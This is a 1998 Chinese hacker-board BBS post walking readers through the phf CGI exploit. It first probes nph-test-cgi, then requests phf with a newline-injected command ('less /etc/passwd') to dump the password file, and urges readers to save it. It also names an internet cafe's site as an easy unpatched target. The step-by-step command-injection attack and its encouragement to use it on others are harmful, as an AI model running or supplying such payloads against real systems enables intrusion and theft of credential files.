发信人: redalert.bbs@bbs.dlut.edu.cn (红色警报), 信区: cnhacker
标  题: 猜猜密码(F)
发信站: 碧海青天 (Fri Oct  9 00:29:43 1998)
转信站: Lilac!ustcnews!DUT
出  处: rose.dlut.edu.cn

  [[实例探讨]]
   
  System Holes #1 中所介绍的 WWW 入侵法是这样子的:
           http://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再
           http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd

   [1] 用 WWW Browser 连到 yournet.net
   [2] Location 输入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"
   [3] 接著如果出来一份像 Report 的画面的话, 接著输入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
   [4] 发生了甚麽事?? etc/passwd 在你的浏览器中 "显示" 出来了 !! 快点 Save 吧
!!

  这个方法所用的是系统 "检索" 的漏洞, 不提供这个功能,
或是伺服器检索类型不同的机器则不
  会接受这样的指令, 当然也就逃过我们这次的模拟演练啦 !! 但是.... 相信我,
你一定会找到一
  家脱线的网路咖啡, 并没有像我们一样每天阅读 Mail List 的信,
对系统安全一点研究也没有的
  人不在少数. http://hacker.welcome.com 就是这样的一个 Net Coffee Shop...

--
1：   速度+金钱+智慧=胜利

※ 来源:．碧海青天 bbs.dlut.edu.cn．[FROM: nihao.dlut.edu.c]